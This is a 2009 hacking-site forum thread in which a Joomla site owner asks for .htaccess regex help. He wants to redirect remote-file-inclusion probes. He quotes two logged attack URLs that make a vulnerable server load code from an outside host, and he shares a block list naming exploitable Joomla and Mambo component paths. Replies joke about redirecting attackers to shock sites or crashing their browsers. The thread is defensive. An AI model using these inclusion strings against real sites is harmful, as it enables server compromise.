I-Hacked.com Taking Advantage Of Technology - Re:.htaccess Regex Help

Home Forums

21 November 2009

Main Menu

- - - - - - -

- - - - - - -

Latest Edge

Vote for us in Top 100 Security Sites

Newsflash

I-Hacked Forums

home | post reply | threaded view | help | rules

Boardwalk :: Forum List

<< Start < Prev 1 2 Next > End >>

joesomebody

User

Platinum Boarder

Posts: 238

Karma: 20

.htaccess Regex Help - 2007/06/05 21:43 Lately those freaking Turkish hackers have been attempting (unsuccessfully) to get into my site. (I have several blocks, which I will share at the end in case one of the admins wants to block them from this site, as it is Joomla based too)I enjoy playing with them though, by 301 Redirecting them to my noindex.html page. I may eventually just redirect them to goatse, but I need some help with a couple of their URL strings, as I suck at .htaccess regex....I want to redirect the following to my noindex.html page, but I don't care whether it uses mod_rewrite or a basic redirect...I just need a little help...

//administrator/components/com_mamboboard/file_upload.php=http://85.92.144.90/squirrelmail-1.4.9a/ doc/ReleaseNotes/1.9/cronos.c
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt

I want to block any URL containing everything up to the = that comes before their URL, which opens a bunch of evil code, I assume...

My current blocks (for Joomla and Mambo):

Code:


 
#ANTIHACK
Redirect 301 /projects/libraries/pcl/pcltar.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_babackup/classes/Tar.php http://www.mattparnell.com/noindex.html
Redirect 301 //administrator/components/com_mamboboard/file_upload.php= http://www.mattparnell.com/noindex.html
Redirect 301 //administrator/components/com_remository/admin.remository.php http://www.mattparnell.com/
noindex.html
Redirect 301 /administrator/components/com_a6mambocredits/admin.a6mambocredits.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_comprofiler/plugin.class.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_cropimage/admin.cropcanvas.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_mgm/help.mgm.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_remository/admin.remository.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_serverstat/install.serverstat.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_uhp/uhp_config.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/components/com_webring/admin.webring.docs.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_artlinks/artlinks.dispnew.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_cpg/cpg.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_galleria/galleria.html.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_performs/performs.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_phpshop/toolbar.phpshop.html.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_rsgallery/rsgallery.html.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_smf/smf.php http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_zoom/includes/database.php http://www.mattparnell.com/noindex.html
Redirect 301 //function.is-dir http://www.mattparnell.com/noindex.html
Redirect 301 /function.is-dir http://www.mattparnell.com/noindex.html
Redirect 301 //administrator/components/com_remository/admin.remository.php http://www.mattparnell.com/
noindex.html
Redirect 301 /function.require http://www.mattparnell.com/noindex.html
Redirect 301 /function.require-once http://www.mattparnell.com/noindex.html
Redirect 301 /components/com_zoom/classes/iptc/EXIF_Makernote.php http://www.mattparnell.com/noindex.html
Redirect 301 //components/com_joomlaboard/file_upload.php http://www.mattparnell.com/noindex.html
Redirect 301 /administrator/:/www.mattparnell.com/index.php http://www.mattparnell.com/noindex.html
Redirect 301 /projects//components/com_joomlaboard/file_upload.php http://www.mattparnell.com/noindex.html
Redirect 301 /projects/top-10-must-have-joomla-addons.html//components/com_joomlaboard/file_upload.php http://www.mattparnell.com/noindex.html
Redirect 301 /projects//components/com_joomlaboard/file_upload.php http://www.mattparnell.com/noindex.html
#END ANTIHACK

http://www.mattparnell.com

| | The administrator has disabled public write access.

greggorievich

User

Platinum Boarder

Posts: 733

Karma: 17

Re:.htaccess Regex Help - 2007/06/05 22:20 off topic, but might i suggest putting something sarcastic on your noindex.html page? lol

| | The administrator has disabled public write access.

joesomebody

User

Platinum Boarder

Posts: 238

Karma: 20

Re:.htaccess Regex Help - 2007/06/05 22:43 Really, wouldn't goatse or tubgirl be more appropriate? Actually, that's too mean...I should write a php function that just loops over and over again...lol...crash their script/browsers...

Suggestions? I am too lazy to write code...what kind of remark would you use? http://www.mattparnell.com

| | The administrator has disabled public write access.

LinkinCable

User

Platinum Boarder

Posts: 258

Karma: 35

Re:.htaccess Regex Help - 2007/06/05 23:23 How about a script that will say things (like looking at a terminal) and say things like access denied and add a line that will find their Ip and display it, and after thats done redirect em to a redirect page that redirects to its self in .1 seconds and a line that makes the browser pop under.. just a idea...lol Blazin Hits Radio Website.
Here
My Myspace.
Here

My Portfolio

| | The administrator has disabled public write access.

CodedChaos
User

Platinum Boarder

Posts: 770

Karma: 27

Re:.htaccess Regex Help - 2007/06/06 03:45 since I have root access, I just ban em via BFD service

| | The administrator has disabled public write access.

joesomebody

User

Platinum Boarder

Posts: 238

Karma: 20

Re:.htaccess Regex Help - 2007/06/06 04:17 Good deal...perhaps i-hacked won't be taken again. http://www.mattparnell.com

| | The administrator has disabled public write access.

<< Start < Prev 1 2 Next > End >>

Boardwalk :: Forum List

Joomlaboard Forum Component 1.1.2 Stable
Two Shoes M-Factory

I-Hacked's Most Popular
Google Hacking Hacking Coke Machines DIrtY MIRT (Do It Yourself Mobile Infra Red Transmitter) Inside Programmable Road Signs Beer Can Padlock Shim

2006 I-Hacked T-Shirts
I-Hacked T-Shirts Have been released, Now with 3 versions! Check them out here

Latest Articles
Cracking WPA FAST with video cards DEFCON17 Compressed Air T-Shirt Cannon Modding the Asus EEE 4G Surf for an External Antenna Understanding SEH (Structured Exception Handler) Exploitation I-Hacked Live on Pauldotcom Tonight! I-Hacked Live on Pauldotcom Tonight! Twitter Security Cam BackTrack4 (beta) has been released. I-Hacked Shmoocon

If you see information here that you know is inaccurate, out of date, misleading, confusing, or just blatantly wrong, please let us know. Updates and corrections are reviewed and updated as they are received.

Disclaimer

I-hacked.com does not take any responsibility with the information presented. Any information provided on this site is not guaranteed in any way. Some articles may discuss topics that are illegal, so this information is provided for educational purposes only, use at your own risk. If you blow up your car, home, computer, or anything else -- it's not our fault, use good judgement and play nice.

© I-Hacked.com LLC